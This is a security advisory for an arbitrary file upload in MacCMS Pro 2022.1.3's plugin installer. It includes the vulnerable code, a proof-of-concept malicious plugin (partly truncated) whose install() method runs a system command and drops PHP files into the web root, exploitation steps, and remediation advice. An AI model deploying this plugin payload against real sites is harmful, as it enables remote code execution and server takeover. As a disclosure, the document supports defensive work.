# MacCMSPro Plugin Management Arbitrary File Upload Vulnerability Security Report #1 ## Vulnerability Overview MacCMSPro has a security vulnerability in its plugin management feature, allowing attackers to upload arbitrary files. By uploading a plugin package containing malicious code, an attacker can exploit the backend plugin installation functionality to directly execute user-uploaded code during the installation process, thereby achieving remote code execution (RCE) and gaining full control of the server. ## Impact Scope - **Affected Version**: MacCMS Pro 2022.1.3 - **Official Website**: https://www.macms.pro/ ## Vulnerability Analysis and Exploit Code ### Core Vulnerable Code ```php // [1] Verify file extension and size (only ZIP is verified) $info = $file->rule('uniqid')->validate(['size' => 10240000, 'ext' => 'zip'])->move($... if ($info) { $tmpName = substr($info->getFilename(), 0, strpos($info->getFilename(), '.')); $tmpAddonDir = ADDON_PATH . $tmpName . DS; $tmpFile = $addonTmpDir . $info->getSaveName(); // [2] Installing the plugin install(); // Execute the installation method(which can include any code) } } ``` ### Malicious Plugin Code (Cmdplugin.php) ```php "; $file_path = 'C:\\phpstudy\\phpstudy_pro\\WWW\\whoami.php'; file_put_contents($file_path, $content); // Also create a file to display detailed information $detail_content = "System Command Execution TestCurrent User: " . trim($output) . ""; $detail_path = 'C:\\phpstudy\\phpstudy_pro\\WWW\\cmd_result.php'; file_put_contents($detail_path, $detail_content); return true; } public function uninstall() { return true; } public function enable() { return true; } public function disable() { return true; } } ``` ### Plugin Configuration File (info.ini) ```ini name = cmdplugin title = Command Execution Plugin type = plugins intro = System command execution test author = hacker website = http://evil.com version = 1.0.0 state = 0 ``` ### Exploitation Steps 1. Package the above code into `cmdplugin.zip` 2. Log in to the admin panel (`/admin/admin/addon/add.html`) 3. Click “Offline Install” → “Upload” 4. Upload the malicious zip file 5. Access the generated files to trigger command execution: - `http://xxx.xxx.xxx/whoami.php` - `http://xxx.xxx.xxx/cmd_result.php` ### Remediation Measures 1. **Validate Plugin Content**: Before installing a plugin, perform strict security scanning and validation of the uploaded zip file contents. 2. **Restrict Code Execution**: Prohibit direct execution of user-provided code during plugin installation, especially within the `install()` method. 3. **Sandbox Mechanism**: Run the plugin installation process in an isolated sandbox environment to limit access to server resources. 4. **Access Control**: Ensure the plugin installation process follows the principle of least privilege, avoiding execution of code with high privileges. 5. **Code Audit**: Conduct a comprehensive code audit of the plugin management module and fix all potential security vulnerabilities.